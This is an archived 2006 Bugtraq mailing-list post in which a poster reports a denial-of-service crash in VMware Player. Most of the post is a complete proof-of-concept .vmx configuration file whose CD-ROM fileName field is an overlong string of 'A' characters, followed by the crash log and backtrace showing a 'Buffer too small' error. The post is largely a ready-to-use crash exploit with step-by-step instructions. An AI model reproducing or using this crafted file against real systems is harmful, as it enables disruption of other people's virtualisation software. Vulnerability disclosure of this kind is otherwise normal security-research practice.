lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 18 Jun 2006 13:02:01 -0000
From: co296@....com
To: bugtraq@...urityfocus.com
Subject: Vm ware 0day dos exploit by n00b.


Credit's : n00b 
 
email : co296@....com
 
Erm was wondering if you could take a close look at this it is a 0day dos exploit by me i found tonight in vmware i have even debug for you guy's to take a look at.I hope you guy's will put it up after checking through it.Ok the first thing is vmware use's.vmx file's as like config file's 
 
the problem as follows in vmx file's we have to change the name of our file.iso 
Following line's ide1:0.fileName =  
 
but if wee change it to the following it will cause a d0s and vmware will have to be shut down and rebooted.The file has an overly long file name as follows 
example.<.Expliotation.>
#Edit line below to change ISO to boot from
ide1:0.fileName = AAAA etc. and alot more see dubug for exact amount. .iso
 
Save as 
dos.vmx 
 
Open with vmare player and you will see it crash..I have provided the following proof of concept available here 
 
[code]
config.version = "8"
virtualHW.version = "4"
displayName = "credit's to n00b for find this vouln"
annotation = "Live CD ISO http://www.irongeek.com"
guestinfo.vmware.product.long = "credit's to n00b for find this vouln"
guestinfo.vmware.product.url = "http://www.millw0rm.com"
guestinfo.vmware.product.short = "LCDI"
guestinfo.vmware.product.version.major = "1"
guestinfo.vmware.product.version.minor = "0"
guestinfo.vmware.product.version.revision = "0"
guestinfo.vmware.product.version.type = "release"
guestinfo.vmware.product.class = "virtual machine"
guestinfo.vmware.product.build = "1.0.0rc8-20051212"
uuid.action = "create"
guestOS = "winxppro"
#####
# Memory
#####
memsize = "128"
# memsize = "256"
# memsize = "512"
# memsize = "768"
#
# Alternative larger memory allocations
#####
# USB
#####
usb.present = "TRUE"
#####
# Floppy
#####
floppy0.present = "FALSE"
#####
# IDE Storage
#####
ide1:0.present = "TRUE"
#Edit line below to change ISO to boot from
ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
ide1:0.deviceType = "cdrom-image"
ide1:0.startConnected = "TRUE"
ide1:0.autodetect = "TRUE"
#####
# Network
#####
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
# ethernet0.connectionType = "bridged"
#
# Switch these two to enable "Bridged" vs. "NAT"
#####
# Sound
#####
sound.present = "TRUE"
sound.virtualDev = "es1371"
sound.autoDetect = "TRUE"
sound.fileName = "-1"
#####
# Misc.
#
# (normal)  high
priority.grabbed = "high"
tools.syncTime = "TRUE"
workingDir = "."
#
# (16)  32  64
sched.mem.pShare.checkRate = "32"
#
# (32)  64  128
sched.mem.pshare.scanRate = "64"
#
# Higher resolution lockout, adjust values to exceed 800x600
svga.maxWidth = "800"
svga.maxHeight = "600"
#
# (F) T
isolation.tools.dnd.disable = "FALSE"
#
# (F) T
isolation.tools.hgfs.disable = "FALSE"
#
# (F) T
isolation.tools.copy.disable = "FALSE"
#
# (F) T
isolation.tools.paste.disable = "FALSE"
#
# (T) F
logging = "TRUE"
#
#
# (F) T
log.append = "FALSE"
#
# (3) number of older files kept
log.keepOld = "1"
#
# (0) microseconds
keyboard.typematicMinDelay = 1000000
uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
ethernet0.generatedAddressOffset = "0"
checkpoint.vmState = "live-cd-iso.vmss"
 
tools.remindInstall = "TRUE"
[/code]
 
Open with note pad and save as dos.vmx 
 
the following debug info is available..
 

Thnx to n00b lo0l....It's so late .
 

[code]
vmx| [msg.cdromImage.nofile] File "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC:/ob/bora-19317/bora/lib/string/str.c:192 Buffer too small 0x430f6f
Mar 15 11:19:18: vmx| Backtrace:
Mar 15 11:19:18: vmx| ----Backtrace using dbghelp.dll----
Mar 15 11:19:18: vmx| Module path: C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe
Mar 15 11:19:18: vmx| Module directory: C:\Program Files\VMware\VMware Player\bin\
Mar 15 11:19:18: vmx| backtrace[00] ebp 0x0012f224 eip 0x00436ada params 0x0043ac30 0000000000 0x0012f648 0x00413d5d [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00035ada] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[01] ebp 0x0012f234 eip 0x0043b366 params 0000000000 0x0012f248 0x0abb4258 0x6f2f3a43 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0003a366] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[02] ebp 0x0012f648 eip 0x00413d5d params 0x0067bbfc 0x0067bc1c 0x000000c0 0x00430f6f [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00012d5d] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[03] ebp 0x0012f668 eip 0x0041ae4e params 0x00724daa 0x0abb4258 0x00001000 0x08ef7e88 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00019e4e] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[04] ebp 0x0012f688 eip 0x00430f6f params 0000000000 0x00000002 0x0abb4258 0x08ef5fe0 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0002ff6f] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[05] ebp 0x0012f6b4 eip 0x0040e499 params 0000000000 0x00000002 0x08ef5fe0 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000d499] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[06] ebp 0x0012f6d8 eip 0x0040f778 params 0x00000002 0x0abb4258 0x08ef5fe0 0x000000c9 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000e778] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[07] ebp 0x0012f780 eip 0x00416389 params 0000000000 0x00000002 0x006766a0 0x0012f7a8 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00015389] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[08] ebp 0x0012f798 eip 0x00416426 params 0x00000002 0x006766a0 0x08e84170 0x08e84780 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x00015426] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[09] ebp 0x0012f7bc eip 0x0040ffd7 params 0x0012f7e0 0x005af633 0000000000 0x08f0d800 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x0000efd7] (no symbol information)
Mar 15 11:19:18: vmx| backtrace[10] ebp 0x0012f7c4 eip 0x005af9f8 params 0000000000 0x08f0d800 0x08e84780 0000000000 [C:\Program Files\VMware\VMware Player\bin\vmware-vmx.exe base 0x00400000 0x0001:0x001ae9f8] (no symbol information)
